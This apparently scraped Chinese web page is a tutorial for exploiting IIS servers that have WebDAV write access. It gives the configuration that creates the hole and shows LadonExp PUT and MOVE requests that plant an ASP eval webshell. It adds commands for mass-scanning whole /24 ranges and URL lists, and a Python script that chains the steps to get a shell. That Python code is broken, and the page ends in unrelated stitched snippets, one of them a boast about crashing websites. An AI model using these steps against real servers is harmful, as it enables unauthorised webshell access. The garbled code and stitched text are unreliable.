相关文章推荐
体贴的麦片  ·  @Transactional ...·  1 年前    · 
温暖的长颈鹿  ·  react + ...·  1 年前    · 
内向的炒饭  ·  Android WebView - 简书·  1 年前    · 

LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。

该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

IIS配置

1 启用webdav组件
2 目录给写权限(为了方便直接eveyone完全写入权限)
3 脚本资源访问权限(不然MOVE失败即无法GetShell)

使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video

LadonExp配置PUT

功能:上传123.TXT
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
点击buildexe->TestExe测试
成功返回 Created

LadonExp配置MOVE

功能:将123.txt改名1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp

点击buildexe->TestExe测试
成功返回 Created

PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell

Ladon批量

扫描C段,当然也可以A段B段

Ladon 192.168.1.1/c 生成.dll
Ladon 192.168.1.1/24 生成.dll

TXT批量

url.txt里放批量地址,不在同一个段的,示例如下
http://192.168.1.1
http://192.10.5.8:808

Ladon 生成.dll

Exploit

Python实现利用代码

#encoding="utf-8"
import requests
put_url = 'http://192.168.1.22/2.txt'
move_url = 'http://192.168.1.22/2.txt'
move_headers = {
    'Destination':'http://192.168.1.22/shell.asp'
put_data = "<%eval request('k8gege')%>"
post_data = {
    '#':''
    response = requests.request('PUT',url=put_url,data=put_data)
    if response.status_code == 200:
        response = requests.request('MOVE',url=move_url,headers=move_headers)
        if response.status_code == 207:
            response = requests.post(url='http://192.168.1.22/shell.asp',data=post_data)
            print(response.content.decode("gb2312"))
        else:
            print(response.status_code)
except:

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
IIS Exp: https://github.com/k8gege/iisput

LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。漏洞成因该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。IIS配置1 启用webdav组件2 目录给写权限(为了方便直接eveyone完全写入权限)3 脚本资源访问权限(不然MOVE失败即无法GetShell)漏洞复现使用LadonEXP可轻松复现 熟悉并掌握 IIS 漏洞利用工具的利用方法,了解具体的功能内 容,亲自实践操作,并根据课程需求完成相关任务。 2. 工具功能说明 IIS 漏洞利用工具是由桂林老兵的一款漏洞利用工具,专门针对 IIS 漏洞。 接下来我们具体介绍一下相关的使用。 2.1.第一部分 数据包格式 该功能模块默认的数据包传输方法有 7 种,分别是: OPTIONS 返回服务器的各种信息 PUT 生成上传文件数据包的。 POST 用来提交表单 MOVE 是改名数据包。 COPY 是复制数
最近在搞网站,不小心把几个站给搞垮了,具体就不说了,过程也无非是扫描,我用的方法是IIS权限    跟平常的注入也不一样,大家如果没有找到注入点的话,可以试试IIS权限,             下面的文章是网上转载来的,大家了解一下过程 //上个月给黑手投去了,人家既然没有发表,我就发出来吧,毕竟文章的原创内容太少,技术含量也没有多高。  最近对IIS的一些安全设置做了下
这时候千万不要放弃,经验告诉我,IIS IIS PUT Scanner的上传功能很不给力,完全是鸡肋,可以利用NC或者老兵的IIS权限利用工具。 上传一个马儿上去瞧瞧: 上传成功。 未完,待续…… 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 具体的原理在这个链接里。 http://www.2cto.com/Article/201307/228165.html 这个帖子是以前在法客里...
Alist WebDAV 是一种应用程序编程接口(API)和协议,它使客户端设备可以访问支持WebDAV的服务器上的文件和相关元数据。WebDAV是Web分布式作者和版本管理协议的缩。通过这种协议,客户端应用程序可以在Web服务器上创建,读取、入和删除文件,并通过HTTP协议进行远程协作和交互。 Alist WebDAVWebDAV协议的实现之一,通过这种协议,可以轻松地将文件存储到互联网上的服务器上,以实现文件的共享和协作。 Alist WebDAV 通过提供一种统一的接口和数据格式,使得不同的操作系统和应用程序都可以互相交换文件,并方便地进行信息共享和交互。 在使用Alist WebDAV时,用户只需要将文件上传到支持WebDAV的服务器上,就可以在不同的设备及应用程序之间共享文件。此外,Alist WebDAV 还可以与其它应用程序结合使用,以实现对WebDAV服务器的请求响应,包括通过HTTP协议接收和发送文件信息,以及使用WebDAV管理元数据和文档版本管理等功能。 总的来说,Alist WebDAV 为客户端设备与Web服务器之间的文件共享和协作提供了一种可靠的协议和API。它不仅适用于个人用户和小型企业,也适用于大型企业和组织机构。 Alist WebDAV 的广泛应用,极大地推动了数据共享和信息协作的发展。